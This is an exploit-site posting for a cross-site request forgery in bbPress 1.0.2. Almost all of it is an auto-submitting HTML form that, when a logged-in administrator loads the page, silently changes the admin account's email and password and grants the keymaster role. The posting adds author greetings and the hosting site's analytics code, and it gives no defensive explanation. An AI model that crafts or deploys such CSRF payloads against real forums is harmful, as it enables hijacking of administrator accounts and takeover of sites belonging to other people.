bbPress v1.0.2 Cross-Site Request Forgery
Posted on 29 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>bbPress v1.0.2 Cross-Site Request Forgery</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= bbPress v1.0.2 Cross-Site Request Forgery ========================================= : # Software : bbPress v 1.0.2 CSRF : # site : www.bbpress.org : # date : 29/6/2010 : # Author : saudi0hacker : # Date : May 25, 2010 : # Type : CSRF : # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com <html> <body onload=\"document.forms[\'Login\'].submit();\"> <form method=\"post\" name = \"Login\" action=\"http://localhost/bb/profile.php?id=1&tab=edit\"> <select type=\"hidden\" name=\"display_name\" id=\"display_name\"> <option type=\"hidden\" id=\"display_displayname\" value=\"admin\">admin</option> <input type=\"hidden\" name=\"user_email\" id=\"user_email\" value=\"admin@sss.com\" /> <input id=\"_wpnonce\" name=\"_wpnonce\" value=\"98dfb69b68\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/bb/profile.php?id=1&tab=edit\" /> <select type=\"hidden\" id=\"admininfo_role\" name=\"role\"> <option value=\"keymaster\" selected=\"selected\">Key Master</option> <input name=\"pass1\" type=\"hidden\" value= \"admin1234\" id=\"pass1\" autocomplete=\"off\" /> <input name=\"pass2\" type=\"hidden\" value= \"admin1234\" id=\"pass2\" autocomplete=\"off\" /> <input type=\"submit\" name=\"Submit\" value=\"save\" /> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>